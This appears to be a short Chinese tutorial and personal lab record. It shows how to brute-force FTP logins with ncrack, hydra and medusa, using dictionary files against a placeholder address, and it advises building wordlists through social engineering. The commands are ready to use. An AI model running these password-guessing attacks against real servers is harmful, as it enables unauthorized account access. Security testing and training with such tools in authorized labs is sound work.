ftp密码破解——ncrack、hydra、medusa

ftp密码破解

——ncrack、Hydra、medusa

下面和大家分享三个kali linux中的密码破解工具（ncrack，hydra、medusa），本文主要介绍一下一些关于ftp破解过程中的简单的命令。

首先，我们可以通过直接在终端用ncrack得到ncrack版本以及相关命令的解释，如图

直接上手操作，在我们不知道用户名以及密码的情况下爆破：

我们需要用字典生成工具生成一个字典，放在桌面上备用。

命令：ncrack –U /root/桌面/pass.txt –P /root/桌面/pass.txt ftp://000.000.000.000

解释：-U为用户名，后面的/root/桌面/pass.txt 为爆破字典所在位置，同样-P为密码，后面的/root/桌面/pass.txt 也为爆破字典所在位置。只要你的字典足够强大，那么就是时间问题了。在组成字典的时候，要综合运用社工等方法形成一套适合的字典。ftp后面的000.000.000.000为ftp的地址，根据自己实际情况来改动。

在我们，知道用户名的情况下爆破：

ncrack --user 用户名 -P /root/桌面/pass.txt ftp://000.000.000.000

解释同上，但要注意--user是两道杠，并且user是小写，kali linux大小写敏感。

用Hydra再来进行一遍一样的实验：

在不知用户名以及密码的情况下，采用自己生成的密码爆破：

命令：hydra ftp://000.000.000.000 -L /root/桌面/pass.txt -P /root/桌面/pass.txt

在已知用户名的情况下爆破：

命令：hydra ftp://000.000.000.000 -l 用户名 -P /root/桌面/pass.txt

注意大小写，小写的l，大写的P

最后，来介绍一下medusa的操作方法

操作命令：

medusa

-h target （ftp的地址）

-H many targets

-u 已知用户名

-U 用户名的字典文件

-p 已知密码

-P 密码的字典

-M 模式 ftp http telnet ssh

实战命令：

已知用户名爆破密码：

medusa -h 000.000.000.000 -u 用户名 –P /root/桌面/pass.txt -M ftp

未知用户名爆破密码：

medusa -h 000.000.000.000 -U /root/桌面/pass.txt –P /root/桌面/pass.txt -M ftp

个人来说，比较喜欢hydra的界面，用户名和密码都能很清晰的显示出来。好了，至此两个工具的实验介绍就告一段落了，能力有限，只是写出了爆破时所需要的命令以及实验过程，作为自己的实验记录，欢迎各路大牛指正。本文仅用于学习交流，请勿用于违法操作。